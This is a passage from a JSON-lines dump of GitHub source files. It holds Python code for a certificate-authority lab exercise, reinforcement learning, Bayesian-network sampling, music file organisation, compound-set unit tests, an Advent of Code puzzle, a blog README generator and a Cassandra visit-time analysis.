{K_tmpl_byts}')\n print()\n return (DES_tmpl, ID_s)\n\n\ndef send_certificate(server, DES_tmpl, ID_s):\n # (2Tx) CA -> S: DES[K_tmpl][PKs||SKs||Cert_s||ID_s||TS2] s.t.\n # Cert_s = Sign[SKca][ID_s||ID_ca||PKs]\n # select a key for Application server AS\n key_s = rsa.selectKey()\n PKs, SKs = rsa.split_key_pair(key_s)\n # convert to strings\n PKs_str, SKs_str = (rsa.key2str(k) for k in (PKs, SKs))\n # create the certificate Cert_s\n Cert_s_plain = f'{ID_s}||{ID_pki}||{PKs_str}'\n Cert_s_cipher = rsa.encode(*SKca, Cert_s_plain)\n # get a time stamp\n TS2 = time.time()\n # concatenate the message\n certificate_msg_plain = f'{PKs_str}||{SKs_str}||{Cert_s_cipher}||{ID_s}||{TS2}'\n certificate_msg_cipher = DES_tmpl.encrypt(certificate_msg_plain)\n print(f'(a2) CA encrypted: {certificate_msg_cipher}')\n print(''.join((f'(a2) CA generated: ', str({'PKs': PKs, 'SKs': SKs}))))\n print(f'(a2) CA signed: {Cert_s_cipher}')\n print()\n # send the message (already in bytes)\n server.send(certificate_msg_cipher)\n\n\n# run the server until SENTINEL is given\nif __name__ == '__main__':\n respondCertification(NODE, SERVER)\n# end if __name__ == '__main__'\n\n","repo_name":"lduran2/cis3319-wireless_networks_security","sub_path":"lab01/CertificateAuthority.py","file_name":"CertificateAuthority.py","file_ext":"py","file_size_in_byte":4073,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12393941854","text":"import sys\nimport os\nimport pathlib\nimport logging\nimport statistics\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nPATH_TO_SRC_DIR = 
os.path.join(pathlib.Path(__file__).parent.resolve(), \"../\", \"src/\")\nsys.path.insert(0, PATH_TO_SRC_DIR)\n\nfrom data_utils.race_track import RaceTrackLoader, RaceTrack, RaceCar\nfrom learning_algorithms.racetrack_value_iteration import RaceTrackValueIteration, QLearning, SARSA\n\nlog_level = logging.INFO\nLOG = logging.getLogger(__name__)\nLOG.setLevel(log_level)\nhandler = logging.StreamHandler(sys.stdout)\nhandler.setLevel(log_level)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\nLOG.addHandler(handler)\n\nif __name__ == \"__main__\":\n learning_type = sys.argv[1] # First arg determines learning type, accepts value/Q/SARSA\n track_name = sys.argv[2] # Second arg determines track type. accepts L/O/R\n max_iterations = int(sys.argv[3]) # Third arg is an integer that determines the number of iterations to run\n crash_protocol = sys.argv[4] # Fourth arg determines the crash policy, if arguement is \"reset\", a crash resets the\n # car to it's start position...\n\n # Determine track type\n if \"L\" in track_name:\n LOG.info(\"Learning L shaped track\")\n rt = RaceTrackLoader.LoadLTrack()\n elif \"R\" in track_name:\n LOG.info(\"Learning R shaped track\")\n rt = RaceTrackLoader.LoadRTrack()\n elif \"O\" in track_name:\n LOG.info(\"Learning O shaped track\")\n rt = RaceTrackLoader.LoadOTrack()\n else:\n LOG.fatal(f\"{track_name} not a supported track name\")\n exit()\n # Determine crash protocol\n if \"reset\" in crash_protocol:\n reset_on_crash = True\n LOG.info(\"Using crash policy: crash means RESET\")\n else:\n reset_on_crash = False\n LOG.info(\"Using crash policy: crash means STOP\")\n # Print track\n rt.print_track()\n start_x, start_y = rt.start_positions()[0] # Car will always start at the first start position of each track...\n rc = RaceCar(rt, start_x, start_y) # Initialize racecar\n\n # Initialize learning model\n if \"value\" in learning_type:\n LOG.info(f\"Performing value iteration with {max_iterations} iterations through state space\")\n learning_model = RaceTrackValueIteration(rt, rc, 0.80, max_iterations, reset_on_crash)\n if \"Q\" in learning_type:\n LOG.info(f\"Performing Q learning with {max_iterations} episodes\")\n # Older stop policy tests used LR 0.25. 
Reset policy tests used 0.75\n learning_model = QLearning(rt, rc, learning_rate=0.25, max_episodes=max_iterations,\n crash_means_restart=reset_on_crash, discount_rate=0.90)\n if \"SARSA\" in learning_type:\n LOG.info(f\"Performing SARSA learning with {max_iterations} episodes\")\n learning_model = SARSA(rt, rc, learning_rate=0.25, max_episodes=max_iterations,\n crash_means_restart=reset_on_crash, discount_rate=0.90)\n # Learn the policy\n learning_model.learn_policy()\n\n\n\n","repo_name":"notmaurox/pyml","sub_path":"learning_examples/run_racetrack_reinforcement_learning.py","file_name":"run_racetrack_reinforcement_learning.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25608658312","text":"from typing import List, Dict\n\nimport torch\nfrom bayesian_network.common.torch_settings import TorchSettings\n\nfrom bayesian_network.interfaces import IBayesianNetworkSampler\nfrom bayesian_network.bayesian_network import BayesianNetwork, Node\n\n\nclass TorchBayesianNetworkSampler(IBayesianNetworkSampler):\n def __init__(self, bayesian_network: BayesianNetwork, torch_settings: TorchSettings):\n self.torch_settings = torch_settings\n self.bayesian_network = bayesian_network\n\n self.samplers: Dict[Node, NodeSampler] = {\n node: NodeSampler(node)\n for node\n in bayesian_network.nodes\n }\n\n def sample(self, num_samples: int, nodes: List[Node]) -> torch.Tensor:\n num_nodes = len(nodes)\n\n samples = torch.empty((num_samples, num_nodes), device=self.torch_settings.device, dtype=torch.int32)\n\n for i_sample in range(num_samples):\n samples[i_sample, :] = self._sample_single_trial(nodes)\n\n return samples\n\n def _sample_single_trial(self, nodes: List[Node]) -> torch.tensor:\n states = dict()\n\n for (i, node) in enumerate(nodes):\n states[node] = self._sample_single_node(node, states)\n\n return torch.tensor([states[node] for node in nodes], device=self.torch_settings.device)\n\n def _sample_single_node(self, node: Node, states: Dict[Node, torch.tensor]) -> torch.tensor:\n for parent in self.bayesian_network.parents[node]:\n if parent not in states:\n states[parent] = self._sample_single_node(parent, states)\n\n parent_states = torch.tensor([states[parent] for parent in self.bayesian_network.parents[node]], device=self.torch_settings.device)\n return self.samplers[node].sample(parent_states)\n\n\nclass NodeSampler:\n def __init__(self, node: Node):\n self.cpt = node.cpt\n\n def sample(self, parents_states: torch.tensor) -> torch.tensor:\n p = self.cpt[tuple(parents_states)]\n\n return torch.multinomial(p, 1, replacement=True).to(torch.int32)\n","repo_name":"Pim-Mostert/BayesianNetwork","sub_path":"bayesian_network/samplers/torch_sampler.py","file_name":"torch_sampler.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14610464285","text":"import os\nimport pymssql\n\nfrom os import path\nfrom sqlalchemy.orm import sessionmaker, Session\n\nclass MoveFileStep:\n priority = 70\n step_name = 'MoveFile'\n\n def execute(self, file_name: str, db_session: sessionmaker, conn: pymssql.Connection) -> (str, bool):\n # Get the folder we are moving the music to.\n base_folder = './shares/music'\n\n # Get the info to compute the new location for the song.\n cursor: pymssql.Cursor = conn.cursor()\n cursor.execute('EXEC sp_SelectSongLocationInfo %s', file_name)\n artist, album, track_number, title = 
cursor.fetchone()\n\n # Update the values to be path safe.\n artist = artist.replace('/', '_')\n album = album.replace('/', '')\n title = title.replace('/', '')\n\n # Get the filder name.\n folder = path.join(base_folder, artist + ' - ' + album)\n # Get the file name.\n new_file_name = str(track_number) + ' - ' + title\n\n # Create the path if it does nto exist.\n if not path.isdir(folder):\n os.mkdir(folder)\n\n # Get the path without the extension.\n base_path = path.join(folder, new_file_name)\n new_file_path = base_path + '.mp3'\n lyrics_path = base_path + '.txt'\n\n # Get the lyrics\n cursor.execute('EXEC sp_SelectLyrics %s', file_name)\n lyrics = cursor.fetchone()[0]\n\n # If we have lyrics, save them.\n if lyrics is not None:\n with open(lyrics_path, 'w') as f:\n f.write(lyrics)\n\n # Move the music file.\n os.rename(file_name, new_file_path)\n\n # Update new information.\n cursor.execute('EXEC sp_UpdatePath %s, %s', (file_name, new_file_path))\n\n cursor.close()\n\n return new_file_path, True\n","repo_name":"clcrutch/music-org","sub_path":"steps/MoveFile.py","file_name":"MoveFile.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17003633451","text":"# -*- coding: utf-8 -*-\nimport json # noqa: F401\nimport os # noqa: F401\nimport pickle\nimport shutil\nimport time\nimport unittest\nfrom configparser import ConfigParser\nfrom os import environ\nimport zipfile\nimport csv\n\nfrom unittest.mock import patch\n\nfrom CompoundSetUtils.CompoundSetUtilsImpl import CompoundSetUtils\nfrom CompoundSetUtils.CompoundSetUtilsServer import MethodContext\nfrom CompoundSetUtils.authclient import KBaseAuth as _KBaseAuth\nfrom installed_clients.DataFileUtilClient import DataFileUtil\nfrom installed_clients.WorkspaceClient import Workspace as workspaceService\n\n\nclass CompoundSetUtilsTest(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n token = environ.get('KB_AUTH_TOKEN', None)\n config_file = environ.get('KB_DEPLOYMENT_CONFIG', None)\n cls.cfg = {}\n config = ConfigParser()\n config.read(config_file)\n for nameval in config.items('CompoundSetUtils'):\n cls.cfg[nameval[0]] = nameval[1]\n # Getting username from Auth profile for token\n authServiceUrl = cls.cfg['auth-service-url']\n auth_client = _KBaseAuth(authServiceUrl)\n user_id = auth_client.get_user(token)\n # WARNING: don't call any logging methods on the context object,\n # it'll result in a NoneType error\n cls.ctx = MethodContext(None)\n cls.ctx.update({'token': token,\n 'user_id': user_id,\n 'provenance': [\n {'service': 'CompoundSetUtils',\n 'method': 'please_never_use_it_in_production',\n 'method_params': []\n }],\n 'authenticated': 1})\n cls.wsURL = cls.cfg['workspace-url']\n cls.wsClient = workspaceService(cls.wsURL)\n cls.serviceImpl = CompoundSetUtils(cls.cfg)\n cls.scratch = cls.cfg['scratch']\n cls.callback_url = os.environ['SDK_CALLBACK_URL']\n\n cls.dfu = DataFileUtil(cls.callback_url)\n\n @classmethod\n def tearDownClass(cls):\n if hasattr(cls, 'wsId'):\n cls.wsClient.delete_workspace({'id': cls.wsId})\n print('Test workspace was deleted')\n\n def getWsClient(self):\n return self.__class__.wsClient\n\n def getWsId(self):\n if hasattr(self.__class__, 'wsId'):\n return self.__class__.wsId\n suffix = int(time.time() * 1000)\n wsName = \"test_CompoundSetUtils_\" + str(suffix)\n ret = self.getWsClient().create_workspace({'workspace': wsName}) # noqa\n self.__class__.wsId = ret[0]\n return ret[0]\n\n def 
getImpl(self):\n return self.__class__.serviceImpl\n\n def getContext(self):\n return self.__class__.ctx\n\n @staticmethod\n def fake_staging_download(params):\n scratch = '/kb/module/work/tmp/'\n inpath = params['staging_file_subdir_path']\n shutil.copy('/kb/module/test/'+inpath, scratch+inpath)\n return {'copy_file_path': scratch+inpath}\n\n def save_compound_set(self):\n comp_set = pickle.load(open('/kb/module/test/compound_set.pkl', 'rb'))\n for compound in comp_set['compounds']:\n compound['kb_id'] = compound['id']\n ws_obj = {\"type\": \"KBaseBiochem.CompoundSet\", \"data\": comp_set,\n \"name\": comp_set['name']}\n info = self.getWsClient().save_objects({'id': self.getWsId(),\n \"objects\": [ws_obj]})[0]\n compoundset_ref = \"%s/%s/%s\" % (info[6], info[0], info[4])\n return compoundset_ref\n\n # NOTE: According to Python unittest naming rules test method names should start from 'test'. # noqa\n @patch.object(DataFileUtil, \"download_staging_file\",\n new=fake_staging_download)\n def test_compound_set_from_file_tsv(self):\n params = {'workspace_id': self.getWsId(),\n 'staging_file_path': 'test_compounds.tsv',\n 'compound_set_name': 'tsv_set_1',\n 'mol2_staging_file_path': 'mol2_files_missing_comp.zip'}\n ret = self.getImpl().compound_set_from_file(self.getContext(), params)[0]\n assert ret and ('report_name' in ret)\n\n @patch.object(DataFileUtil, \"download_staging_file\",\n new=fake_staging_download)\n def test_compound_set_from_exported_tsv(self):\n params = {'workspace_id': self.getWsId(),\n 'staging_file_path': 'test_out.tsv',\n 'compound_set_name': 'tsv_set_2'}\n ret = self.getImpl().compound_set_from_file(self.getContext(), params)[0]\n assert ret and ('report_name' in ret)\n\n @patch.object(DataFileUtil, \"download_staging_file\",\n new=fake_staging_download)\n def test_compound_set_from_file_sdf(self):\n params = {'workspace_id': self.getWsId(),\n 'staging_file_path': 'test_compounds.sdf',\n 'compound_set_name': 'sdf_set',\n 'mol2_staging_file_path': 'mol2_files.zip'}\n ret = self.getImpl().compound_set_from_file(self.getContext(), params)[0]\n assert ret and ('report_name' in ret)\n\n @patch.object(DataFileUtil, \"download_staging_file\",\n new=fake_staging_download)\n def test_compound_set_to_file_tsv(self):\n\n params = {'workspace_id': self.getWsId(),\n 'staging_file_path': 'test_compounds.tsv',\n 'compound_set_name': 'tsv_set_3',\n 'mol2_staging_file_path': 'mol2_files.zip'}\n ret = self.getImpl().compound_set_from_file(self.getContext(), params)[0]\n compoundset_ref = ret['compoundset_ref']\n params = {'compound_set_ref': compoundset_ref,\n 'output_format': 'tsv'}\n ret = self.getImpl().compound_set_to_file(self.getContext(), params)[0]\n assert ret and ('file_path' in ret) and ('packed_mol2_files_path' in ret) and ('comp_id_mol2_file_name_map' in ret)\n\n print('compound_set_from_file output\\n{}\\n'.format(ret))\n\n mol2_file_path = ret['packed_mol2_files_path']\n\n mol2_files = zipfile.ZipFile(mol2_file_path).namelist()\n mol2_file_names = [os.path.splitext(os.path.basename(mol2_file))[0] for mol2_file in mol2_files]\n\n w = csv.DictReader(open('test_compounds.tsv'), dialect='excel-tab')\n\n comp_ids = []\n for line in w:\n comp_ids.append(line.get('id'))\n\n self.assertCountEqual(mol2_file_names, comp_ids)\n\n @patch.object(DataFileUtil, \"download_staging_file\",\n new=fake_staging_download)\n def test_mol2_files_to_pdbqt(self):\n\n params = {'workspace_id': self.getWsId(),\n 'staging_file_path': 'test_compounds.tsv',\n 'compound_set_name': 'tsv_set_4',\n 
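                  # The entry below points at an archive with at least one
                  # compound's mol2 file missing, which is why this test later
                  # asserts subset membership of ids rather than exact equality.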
'mol2_staging_file_path': 'mol2_files_missing_comp.zip'}\n ret = self.getImpl().compound_set_from_file(self.getContext(), params)[0]\n params = {'input_ref': ret['compoundset_ref']}\n ret = self.getImpl().convert_compoundset_mol2_files_to_pdbqt(self.getContext(), params)[0]\n assert ret and ('packed_pdbqt_files_path' in ret) and ('comp_id_pdbqt_file_name_map' in ret)\n\n pdbqt_file_path = ret['packed_pdbqt_files_path']\n\n pdbqt_files = zipfile.ZipFile(pdbqt_file_path).namelist()\n pdbqt_file_names = [os.path.splitext(os.path.basename(pdbqt_file))[0] for pdbqt_file in pdbqt_files]\n\n w = csv.DictReader(open('test_compounds.tsv'), dialect='excel-tab')\n\n comp_ids = []\n for line in w:\n comp_ids.append(line.get('id'))\n\n print('test_mol2_files_to_pdbqt')\n print(comp_ids)\n print(pdbqt_files)\n\n for pdbqt_file in pdbqt_files:\n self.assertTrue(os.path.getsize(pdbqt_file_path) > 0)\n\n # self.assertEqual(len(comp_ids) - 1, len(pdbqt_file_names))\n self.assertTrue(set(pdbqt_file_names).issubset(comp_ids))\n\n def test_compound_set_to_file_sdf(self):\n compoundset_ref = self.save_compound_set()\n params = {'compound_set_ref': compoundset_ref,\n 'output_format': 'sdf'}\n ret = self.getImpl().compound_set_to_file(self.getContext(), params)[0]\n assert ret and ('file_path' in ret)\n\n def test_compound_set_to_file_mol(self):\n compoundset_ref = self.save_compound_set()\n params = {'compound_set_ref': compoundset_ref,\n 'output_format': 'mol'}\n ret = self.getImpl().compound_set_to_file(self.getContext(), params)[0]\n assert ret and ('file_path' in ret)\n\n def test_compound_set_to_file_pdb(self):\n compoundset_ref = self.save_compound_set()\n params = {'compound_set_ref': compoundset_ref,\n 'output_format': 'pdb'}\n ret = self.getImpl().compound_set_to_file(self.getContext(), params)[0]\n assert ret and ('file_path' in ret)\n\n def test_compound_set_to_file_bad_input(self):\n compoundset_ref = self.save_compound_set()\n with self.assertRaisesRegex(ValueError, 'parameter is required'):\n self.getImpl().compound_set_to_file(self.getContext(),\n {'compound_set_ref': compoundset_ref})\n\n with self.assertRaisesRegex(ValueError, 'parameter is required'):\n self.getImpl().compound_set_to_file(self.getContext(),\n {'output_format': 'pdb'})\n\n def test_compound_set_from_model(self):\n model = json.load(open('/kb/module/test/iMR1_799.json'))\n ws_obj = {\"type\": \"KBaseFBA.FBAModel\", \"data\": model,\n \"name\": model['name']}\n info = self.getWsClient().save_objects({'id': self.getWsId(),\n \"objects\": [ws_obj]})[0]\n model_ref = \"%s/%s/%s\" % (info[6], info[0], info[4])\n params = {'workspace_id': self.getWsId(),\n 'model_ref': model_ref,\n 'compound_set_name': 'model_set'}\n ret = self.getImpl().compound_set_from_model(self.getContext(), params)[0]\n assert ret and ('report_name' in ret)\n\n def test_compound_set_export(self):\n compoundset_ref = self.save_compound_set()\n ret1 = self.getImpl().export_compoundset_as_tsv(\n self.getContext(), {'input_ref': compoundset_ref})[0]['shock_id']\n assert ret1 and ret1.count('-') == 4\n ret2 = self.getImpl().export_compoundset_as_sdf(\n self.getContext(), {'input_ref': compoundset_ref})[0]['shock_id']\n assert ret2 and ret2.count('-') == 4\n\n @patch.object(DataFileUtil, \"download_staging_file\",\n new=fake_staging_download)\n def test_mol2_export(self):\n params = {'workspace_id': self.getWsId(),\n 'staging_file_path': 'test_compounds.tsv',\n 'compound_set_name': 'tsv_set_5',\n 'mol2_staging_file_path': 'mol2_files.zip'}\n ret = 
self.getImpl().compound_set_from_file(self.getContext(), params)[0]\n\n mol2_file = self.getImpl().export_compoundset_mol2_files(\n self.getContext(),\n {'input_ref': ret['compoundset_ref']})[0]['packed_mol2_files_path']\n\n mol2_files = zipfile.ZipFile(mol2_file).namelist()\n mol2_file_names = [os.path.splitext(os.path.basename(mol2_file))[0] for mol2_file in mol2_files]\n\n w = csv.DictReader(open('test_compounds.tsv'), dialect='excel-tab')\n\n comp_ids = []\n for line in w:\n comp_ids.append(line.get('id'))\n\n self.assertCountEqual(mol2_file_names, comp_ids)\n\n @patch.object(DataFileUtil, \"download_staging_file\",\n new=fake_staging_download)\n def test_fetch_mol2_from_zinc(self):\n params = {'workspace_id': self.getWsId(),\n 'staging_file_path': 'test_compounds.tsv',\n 'compound_set_name': 'tsv_set_6'}\n ret = self.getImpl().compound_set_from_file(self.getContext(), params)[0]\n compoundset_ref = ret['compoundset_ref']\n\n compoundset = self.dfu.get_objects(\n {'object_refs': [compoundset_ref]})['data'][0]['data']\n hids = [comp.get('mol2_handle_ref') for comp in compoundset['compounds']]\n\n self.assertCountEqual(hids, [None]*9)\n\n params = {'workspace_id': self.getWsId(),\n 'compoundset_ref': compoundset_ref}\n new_compoundset_ref = self.getImpl().fetch_mol2_files_from_zinc(\n self.getContext(), params)[0]['compoundset_ref']\n new_compoundset = self.dfu.get_objects(\n {'object_refs': [new_compoundset_ref]})['data'][0]['data']\n new_hids = [comp.get('mol2_handle_ref') for comp in new_compoundset['compounds']]\n\n self.assertTrue(new_hids.count(None) < 9)\n","repo_name":"kbaseapps/CompoundSetUtils","sub_path":"test/CompoundSetUtils_server_test.py","file_name":"CompoundSetUtils_server_test.py","file_ext":"py","file_size_in_byte":12866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1377205500","text":"#!/usr/bin/env python3\n\nimport sys\nfrom itertools import combinations\n\n# parse input\nscanners = []\nscanner = []\nfor line in open(sys.argv[1]):\n line = line.rstrip()\n if '--- scanner' in line:\n # not first line\n if scanner and len(scanner) > 0:\n scanners.append(scanner)\n scanner = []\n elif len(line) > 0:\n x, y, z = map(int, line.split(','))\n scanner.append((x, y, z))\nscanners.append(scanner)\n\ndistances = []\n\n# --- ok, I didn't figure out the orientation stuff, so\n# I peeked at my son's solution. Sorry. 
But it is allowed\n# to peek after a large number of hours of trying.\n\ndef sub(a, b):\n l = []\n for x, y in zip(a, b):\n l.append(x - y)\n return tuple(l)\n\ndef add(a, b):\n l = []\n for x, y in zip(a, b):\n l.append(x + y)\n return tuple(l)\n\n# return dict of all differences for all coords\ndef diffs(coords):\n d = dict()\n for p in coords:\n l = list()\n for q in coords:\n l.append(sub(p, q))\n d[p] = l\n return d\n\n# return one of 24 possible orientations\ndef orientexpress(p, i):\n x, y, z = p\n return (\n (+x, +y, +z), (+y, +z, +x), (+z, +x, + y), (+z, +y, -x), (+y, +x, -z), (+x, +z, -y),\n (+x, -y, -z), (+y, -z, -x), (+z, -x, - y), (+z, -y, +x), (+y, -x, +z), (+x, -z, +y),\n (-x, +y, -z), (-y, +z, -x), (-z, +x, - y), (-z, +y, +x), (-y, +x, +z), (-x, +z, +y),\n (-x, -y, +z), (-y, -z, +x), (-z, -x, + y), (-z, -y, -x), (-y, -x, -z), (-x, -z, -y)\n )[i]\n\n# return list of lists of all orientations\ndef all_orientations(points):\n ao = []\n for i in range(24):\n ol = []\n for x in points:\n ol.append(orientexpress(x, i))\n ao.append(ol)\n return ao\n\ndef find_offset(coords0, coords2):\n diff1 = diffs(coords0)\n for orientation in all_orientations(coords2):\n diff2 = diffs(orientation)\n # k1: diffs of all points from k1\n for k1, v1 in diff1.items():\n # k2: diffs of all points from k2\n for k2, v2 in diff2.items():\n if len(set(v1) & set(v2)) >= 12:\n return (sub(k1, k2), orientation)\n return False\n\ndef new_absolute(absolute, coords):\n diff, coords2 = find_offset(absolute, coords)\n for p in coords2:\n np = add(p, diff)\n # no duplicates\n if not np in absolute:\n absolute.append(np)\n return absolute\n\n\n# Convert all points to relative scanner 0\ndef relative_scanner0(absolute, remaining):\n global distances\n\n while True:\n # This takes time, print progress\n print(len(remaining))\n\n if len(remaining) == 0:\n # done, all converted to absolute\n return absolute\n\n for r in remaining:\n offset = find_offset(absolute, r)\n if offset:\n distances.append(offset[0])\n absolute = new_absolute(absolute, r)\n remaining.remove(r)\n break\n\n# main\n\nabsolute = scanners[0]\nremaining = scanners[1:]\n\nl = relative_scanner0(absolute, remaining)\n\n# Sort, to compare with task example output\n#l = sorted(l)\n#print(l)\nprint('part 1:', len(l))\n\ndef manhattan(o1, o2):\n l = []\n for x1, x2 in zip(o1, o2):\n l.append(abs(x1 - x2))\n #print(o1, o2, sum(l))\n return sum(l)\n\nmanhattans = []\nfor o1, o2 in combinations(distances, 2):\n manhattans.append(manhattan(o1, o2))\nprint('part 2:', max(manhattans))\n","repo_name":"AlbertVeli/AdventOfCode","sub_path":"2021/19/day19.py","file_name":"day19.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75007086828","text":"#构建 README.md\nimport os\n\nlines = ['# 个人所有博客内容同步更新\\n\\n\\n',]\n\nblogs = {}\n\ndef doAllFile(path, parent):\n\tfl = os.listdir(path)\n\tfor tempP in fl :\n\t\tcpath = os.path.join(path, tempP)\n\t\tif os.path.isdir(cpath) and not tempP.find('.') == 0:\n\t\t\tparent[tempP] = {}\n\t\t\tdoAllFile(cpath, parent[tempP])\n\t\telif os.path.isfile(cpath) and tempP.find('README') == -1 and os.path.splitext(tempP)[1] == \".md\" :\n\t\t\tparent[\"files\"] = parent.get(\"files\", [])\n\t\t\tparent[\"files\"].append(os.path.splitext(tempP)[0])\n\t\ndoAllFile(\"./\", blogs)\n\ndef parseBlog(values, depth, root):\n\tif \"files\" in values :\n\t\tfor one in values[\"files\"] :\n\t\t\tlines.append('* [{}]({}{}.md) \\n'.format(one, 
root, one))\n\t\tdel values[\"files\"]\n\tfor path, item in values.items():\n\t\tif item:\n\t\t\tlines.append('\\n' + '#' * depth + ' ' + path + ' \\n\\n')\n\t\t\tparseBlog(item, depth + 1, root + path + \"/\")\n\nparseBlog(blogs, 3, \"https://github.com/bluefeng/blog/blob/master/\")\n\n\nlines.append('\\n转载请注明出处: [http://www.heryc.fun](http://www.heryc.fun) \\n')\n\nwith open('./README.md', 'w') as file:\n\tfile.writelines( lines )\n\n\n","repo_name":"bluefeng/blog","sub_path":"doReadMe.py","file_name":"doReadMe.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70125536426","text":"#TODO: maybe fetch the names to fill the maps with a query, e.g.: select distinct poi_name from entrance_by_poi;\n# the problem is that the travel-time matrix would then have to be updated with the new combinations (which were calculated by hand)\n\nfrom cassandra.cluster import Cluster\n\nimport uuid\nimport datetime \nimport time\n\nstartTime = time.time()\n\ncluster = Cluster(protocol_version = 3)\nsession = cluster.connect('vrcard')\n\n\n#name-to-index map\nnameIndexDict = {\n    \"Centro Fotografia\": 0,\n    \"Santa Anastasia\": 1,\n    \"Museo Storia\": 2,\n    \"Torre Lamberti\": 3,\n    \"Arena\": 4,\n    \"Palazzo della Ragione\": 5,\n    \"Giardino Giusti\": 6,\n    \"Sighseeing\": 7,\n    \"Museo Conte\": 8,\n    \"Castelvecchio\": 9,\n    \"San Zeno\": 10,\n    \"Museo Lapidario\": 11,\n    \"Tomba Giulietta\": 12,\n    \"Museo Radio\": 13,\n    \"Duomo\": 14,\n    \"San Fermo\": 15,\n    \"Casa Giulietta\": 16,\n    \"AMO\": 17,\n    \"Teatro Romano\": 18,\n    \"Museo Africano\": 19,\n    \"Verona Tour\": 20,\n    \"Museo Miniscalchi\": 21\n}\n\n#dict holding the sums\npermanenceTimePOISumDict = {\n    \"Centro Fotografia\": 0,\n    \"Santa Anastasia\": 0,\n    \"Museo Storia\": 0,\n    \"Torre Lamberti\": 0,\n    \"Arena\": 0,\n    \"Palazzo della Ragione\": 0,\n    \"Giardino Giusti\": 0,\n    \"Sighseeing\": 0,\n    \"Museo Conte\": 0,\n    \"Castelvecchio\": 0,\n    \"San Zeno\": 0,\n    \"Museo Lapidario\": 0,\n    \"Tomba Giulietta\": 0,\n    \"Museo Radio\": 0,\n    \"Duomo\": 0,\n    \"San Fermo\": 0,\n    \"Casa Giulietta\": 0,\n    \"AMO\": 0,\n    \"Teatro Romano\": 0,\n    \"Museo Africano\": 0,\n    \"Verona Tour\": 0,\n    \"Museo Miniscalchi\": 0\n}\n\n#dict holding the counts\ncountVisitDict = {\n    \"Centro Fotografia\": 0,\n    \"Santa Anastasia\": 0,\n    \"Museo Storia\": 0,\n    \"Torre Lamberti\": 0,\n    \"Arena\": 0,\n    \"Palazzo della Ragione\": 0,\n    \"Giardino Giusti\": 0,\n    \"Sighseeing\": 0,\n    \"Museo Conte\": 0,\n    \"Castelvecchio\": 0,\n    \"San Zeno\": 0,\n    \"Museo Lapidario\": 0,\n    \"Tomba Giulietta\": 0,\n    \"Museo Radio\": 0,\n    \"Duomo\": 0,\n    \"San Fermo\": 0,\n    \"Casa Giulietta\": 0,\n    \"AMO\": 0,\n    \"Teatro Romano\": 0,\n    \"Museo Africano\": 0,\n    \"Verona Tour\": 0,\n    \"Museo Miniscalchi\": 0\n}\n\n#dict holding the averages in seconds\navreageStayInSeconds = {\n    \"Centro Fotografia\": 0,\n    \"Santa Anastasia\": 0,\n    \"Museo Storia\": 0,\n    \"Torre Lamberti\": 0,\n    \"Arena\": 0,\n    \"Palazzo della Ragione\": 0,\n    \"Giardino Giusti\": 0,\n    \"Sighseeing\": 0,\n    \"Museo Conte\": 0,\n    \"Castelvecchio\": 0,\n    \"San Zeno\": 0,\n    \"Museo Lapidario\": 0,\n    \"Tomba Giulietta\": 0,\n    \"Museo Radio\": 0,\n    \"Duomo\": 0,\n    \"San Fermo\": 0,\n    \"Casa Giulietta\": 0,\n    \"AMO\": 0,\n    \"Teatro Romano\": 0,\n    \"Museo Africano\": 0,\n    \"Verona Tour\": 0,\n    \"Museo Miniscalchi\": 0\n}\n\ncard_serial = ''\n\n# computed stays: contains the place and the length of stay in seconds\nfor val in session.execute(\"select 
computeStay(entrances) from grouped_entrances_by_card\"):\n for key in val[0]: #val[0] contiene la mappa\n permanenceTimePOISumDict[key] = permanenceTimePOISumDict[key] + val[0][key] \n countVisitDict[key] = countVisitDict[key] + 1\n \n\nfor key in permanenceTimePOISumDict:\n\n if countVisitDict[key] != 0:\n avreageStayInSeconds[key] = permanenceTimePOISumDict[key] // countVisitDict[key]\n\n print(key, avreageStayInSeconds[key], countVisitDict[key])\n \n\nprint(\"\\n\")\n\nfor key in avreageStayInSeconds:\n print(key, datetime.timedelta(seconds=avreageStayInSeconds[key]))\n\nprint(\"--- %s seconds ---\" % (time.time() - startTime))\n\n\n'''\n 048667C27B3F80 | 2016-10-05 11:38:52.000000+0000 | Castelvecchio | 2016-10-05 | 35 | vrcard2-48\n 048667C27B3F80 | 2016-10-05 12:14:29.000000+0000 | Arena | 2016-10-05 | 25 | vrcard2-48\n 048667C27B3F80 | 2016-10-05 13:07:10.000000+0000 | Santa Anastasia | 2016-10-05 | 29 | vrcard2-48\n 048667C27B3F80 | 2016-10-05 13:32:57.000000+0000 | Duomo | 2016-10-05 | 31 | vrcard2-48\n 048667C27B3F80 | 2016-10-05 14:34:46.000000+0000 | Torre Lamberti | 2016-10-05 | 41 | vrcard2-48\n 048667C27B3F80 | 2016-10-05 15:02:54.000000+0000 | Casa Giulietta | 2016-10-05 | 28 | vrcard2-48\n\n 04D12ABA7B3F80 | 2016-11-19 17:13:06.000000+0000 | Teatro Romano | 2016-11-19 | 24 | vrcard2-48\n 04D12ABA7B3F80 | 2016-11-20 11:55:14.000000+0000 | Castelvecchio | 2016-11-19 | 35 | vrcard2-48\n 04D12ABA7B3F80 | 2016-11-20 13:20:53.000000+0000 | San Zeno | 2016-11-19 | 26 | vrcard2-48\n 04D12ABA7B3F80 | 2016-11-20 15:40:18.000000+0000 | Duomo | 2016-11-19 | 31 | vrcard2-48\n '''","repo_name":"DebbyX3/cassandra-project","sub_path":"2 sol - tutto raggruppato in 